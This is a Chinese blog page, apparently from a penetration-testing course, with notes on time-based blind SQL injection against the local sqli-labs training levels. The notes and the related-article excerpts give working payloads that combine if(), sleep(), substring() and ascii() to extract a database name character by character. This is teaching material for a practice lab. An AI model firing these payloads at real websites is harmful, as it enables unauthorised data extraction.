sql注入-延时注入

最新推荐文章于 2023-08-23 20:21:44 发布
最新推荐文章于 2023-08-23 20:21:44 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: 笔记 杂七杂八 文章标签: sql注入 延时注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuguojiuai/article/details/124466292
版权

渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客

延时注入和布尔盲注差不多
为什么要延时
因为有的时候我们知道这个地方存在注入但是页面返回信息一样
加了个if延时条件判断
if(条件,是,否)

http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201
返回14秒
http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(10),1)--%201
正常返回4秒

length(database())=1
获取到了数据库长度
请求:localhost/Less-8/index.php?id=1' and if(length(database())=8,sleep(3),1) -- 11  
返回:正常

用到两个函数
substring 截取字符串(1.截取哪个字符串, 2 从哪一位开始,3 取几位)
获取数据库库名:
http://localhost/Less-8/index.php?id=1' and if((select substring(database(),1,1))='s',sleep(3),1) -- 1  获取库名的第一位
ascii
http://localhost/Less-8/index.php?id=1' and if((select ascii(substring(database(),

最低0.47元/天 解锁文章
小韩韩啊
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sql注入-延时注入sleep()、benchmark()函数 延时注入
07-10 6822
延时注入】结合if、case when 延时注入
sql注入延时注入
最新发布
weixin_45653478的博客
04-09 1315
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4780
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
SQL注入之布尔盲注
Mr.Huang_的博客
08-18 502
注入全方位利用-盲注 一、盲注介绍 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件 第一个是用户能够控制输入 1个字符 第二个是原本程序要执行的代码,拼接了用户输入的数据 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 union select 联合查询注入 updatexml 报错注入 布尔盲注:因为他不需要猜字段,不需要union 只需要and or 延时盲注: sleep() 二、
SQL注入(二)
qq_48947141的博客
09-23 647
一、按数据库类型 1、Oracle注入 1.1.Oracle基础知识 Oracle是目前最流行的C/S或B/S体系结构的数据库之一。 数据字典:数据字典是元数据的集合,从逻辑上和物理上描述了数据库及其内容,存储于SYSTEM与SYSAUX表空间内的若干段中。 数据字典视图:数据字典中的数据比较复杂,一般查询的是数据字典视图。 数据字典视图三种不同权限的分类:分别以user,all,dba的前缀开头。 常用的数据字典视图 表名 列名 user_tables:存储用户拥有表的信息
SQL注入技术
qq_25981849的博客
02-14 377
SQL注入技术 漏洞成因 SQL注入漏洞的原因是由于程序员没有严格过滤用户输入,导致用户输入语句与数据库语句拼接成了一个新的合法语句所产生的漏洞。 SQL注入应用技术 SQL注入可以用来读取文件、写入文件、执行系统命令。 SQL注入的不同类型和常用函数 有回显的注入 有回显的漏洞直接走一遍标准流程就行了 报错注入 有的时候页面会显示sql报错,在这种情况下,我们可以通过人为的报错将不可见的信息转换在错误信息显示出来。 updatexml报错注入 uname=Dumb&passwd=0' or upd
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2555
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入延时盲注:也称延时注入、时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时盲注与布尔盲注的核心思想都是通过浏览器两种
SQL注入学习#2
Cloud_Player的博客
03-22 143
MySQL注入实例一 平台:SQli-labs ‘ = %27 空格 = %20 为学习方便,可以借用站长工具url编码进行翻译 Less-1 界面如下: 尝试 ?id=1和?id=100 这时候我们可以尝试在?id=100后面加上’(%27),找到注入点 根据报错返回语句,猜测注入语句 SELECT * FROM XXX WHERE id = ‘XX’LIMIT 0, 1 SELECT * FROM XXX WHERE id = ‘1’LIMIT 0, 1 接下来尝试闭合,–+用以注释掉后面的多
0x01.渗透思路篇
weixin_43263566的博客
05-10 868
0x01.渗透思路篇
SQL注入延时注入
热门推荐
秋水的博客
09-01 2万+
延时注入简介 个人理解: 延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据/ 应用场景: 延时注入的应用场景是,在我们输入and 1或者and 0的时候,页面的返回无变化,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入 相关函数 延时注入会用到布尔盲注的所有...
sql注入的思维导图。
04-19
SQL注入思维导图 SQL注入是一种常见的Web应用程序安全漏洞, attackers...* 多种方式注入最好不用延时注入 * 使用多种方式来绕过WAF SQL注入是一种常见的Web应用程序安全漏洞,需要我们对其进行深入的了解和防御。
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库...SQL注入漏洞测试(delete注入)、SQL过滤字符后手工注入漏洞测试、延时注入(时间注入)等...
MrWQ#vulnerability-paper#SQL 注入基础 (报错注入延时注入)1
07-25
1、判断是否存在报错 2、group by 虚拟表主键重复冲突 3、extractvalue() 函数 4、updatexml() 函数 1、判断字符注入 2、
三种数据库的 SQL 注入详解
08-03
很多人可能会说还有如:Cookie 注入、POST 注入延时注入等,但是这些类型的注入归根结底也是数字型和字符型注入的不同展现形式或者注入的位置不同罢了。 常见数据库的注入攻击者对于数据库注入,无非是利用数据库...
SQL住入原始脚本_SQL注入python脚本_
10-03
用于SQL注入,打开SQLmap运行脚本。布尔盲注 延时注入
SQL手工注入漏洞测试(MySQL数据库)
qq_52718293的博客
11-27 2791
1. order by 查字段 字段至少为四 2. union select 1,2,3,4 (回显位在2和3) 3.查库和版本号 database() version() http://219.153.49.228:44777/new_list.php?id=1%20and%200%20%20%20union%20select%201,database(),version(),4 库名:mozhe_Discuz_StormGroup 4.查表名 219.153.49.228:44777/
sql注入——延时注入
qq_52843411的博客
08-23 967
无论我们怎样变化,或者改变闭合,都无法是页面做出不同的回显,我们有理由相信他为一个静态页面,当然,作为一个练习,这个肯定是有漏洞的,我们可以通过页面相应的时间来做出判断,我们可以通过sleep()函数,来使页面进行延迟响应。我们对页面进行了延时,导致页面的响应时间比正常情况下都要慢五秒钟,我们可以通过对响应时间的长短,来判断真假,要判断真假,就要用到我们的if函数。)第一个字段为判读语句,第二个字段为判断为真时执行的语句,第三个字段为判断为假时执行的语句。我们可知第一个字符ASCII为53,即5。
SQL注入之时间延迟型注入
DM766924的博客
09-16 1499
时间延迟型注入 原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。 时间延迟注入常用SQL函数介绍 if(condition,expr1,expr2)功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定举例:select
cfthub sql注入 时间注入
07-15
你好,C知道在这里!关于CFTHub和SQL注入,我可以为你提供一些基本的信息。 CFTHub是一个开源的漏洞扫描和渗透测试工具,它可以帮助安全专家识别和修复应用程序中的安全漏洞。 SQL注入是一种常见的网络攻击方式,它利用应用程序对用户输入的处理不当,从而在数据库查询中插入恶意的SQL代码。这可能导致数据库被非法访问、数据泄露甚至应用程序的完全控制。 时间注入(Time-based Injection)是SQL注入的一种形式,它利用延时函数或时间相关操作来确认SQL查询是否成功执行。攻击者可以利用时间注入来获取敏感信息或以其他方式干扰应用程序的正常运行。 要防止SQL注入和时间注入攻击,可以采取以下措施: 1. 使用参数化查询或预编译语句来防止用户输入直接插入到SQL查询中。 2. 对用户输入进行严格的验证和过滤,确保只允许预期的数据类型和格式。 3. 限制应用程序对数据库的权限,确保只有必要的操作被执行。 4. 定期更新和维护应用程序和数据库,以修补已知的安全漏洞。 希望这些信息对你有所帮助!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小韩韩啊

你的鼓励是对我最大的支持

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值